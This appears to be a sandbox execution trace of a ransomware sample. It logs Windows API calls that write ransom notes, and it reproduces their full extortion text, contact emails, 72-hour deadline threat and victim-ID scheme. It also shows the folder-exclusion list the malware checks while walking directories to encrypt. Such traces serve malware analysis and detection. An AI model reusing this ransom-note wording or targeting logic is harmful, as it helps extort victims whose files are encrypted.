\r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0176.003] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0176.006] CloseHandle (hObject=0x390) returned 1
	[0176.006] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0176.006] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.006] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0176.019] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0176.019] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0176.020] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0176.020] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0176.020] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0176.021] CloseHandle (hObject=0x390) returned 1
	[0176.021] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.021] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.021] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0176.022] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML") returned 114
	[0176.022] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0176.028] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0176.028] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0176.031] CloseHandle (hObject=0x390) returned 1
	[0176.031] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.032] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0176.032] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.032] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0176.033] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0176.033] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0176.034] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0176.034] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0176.034] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0176.034] CloseHandle (hObject=0x390) returned 1
	[0176.034] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x826f7759, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x82743b0a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0176.035] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\*.*") returned 89
	[0176.035] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.035] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*") returned 0x59
	[0176.035] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.035] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0176.035] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.035] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0176.036] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.036] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0176.036] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.036] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0176.036] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.036] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0176.036] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.037] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0176.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.037] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0176.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.037] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0176.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.037] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0176.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.037] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0176.038] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.038] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0176.038] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.038] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0176.038] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.038] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0176.038] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.039] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0176.039] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.039] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0176.039] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.039] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0176.039] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.039] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0176.039] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.039] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0176.040] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.040] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0176.040] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0176.040] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0176.040] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x826f7759, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x82743b0a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="..", cAlternateFileName="")) returned 1
	[0176.040] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0176.040] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8271da80, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8271da80, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x82743b0a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0176.040] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x826f7759, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x826f7759, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8271da80, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0176.040] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0176.041] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1
	[0176.041] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1
	[0176.041] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov"
	[0176.041] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\"
	[0176.041] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\", lpString2="RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime"
	[0176.041] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime"
	[0176.046] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\"
	[0176.046] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\"
	[0176.046] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\*.*"
	[0176.046] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName=".", cAlternateFileName="")) returned 0xfb9470
	[0176.051] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\*.*") returned 97
	[0176.051] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.051] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*") returned 0x61
	[0176.051] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.051] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0176.051] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.052] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0176.052] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.052] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0176.052] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.052] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0176.052] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.052] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0176.053] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.053] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0176.053] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.053] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0176.053] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.053] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0176.053] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.054] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0176.054] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.054] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0176.054] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.054] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0176.054] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.054] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0176.054] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.055] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0176.055] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.055] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0176.055] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.055] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0176.055] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.055] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0176.056] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.056] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0176.056] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.056] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0176.056] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.056] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0176.056] FindNextFileW (in: hFindFile=0xfb9470, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="..", cAlternateFileName="")) returned 1
	[0176.057] FindNextFileW (in: hFindFile=0xfb9470, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e574f3, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9e574f3, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9e7d76e, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x19aa, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
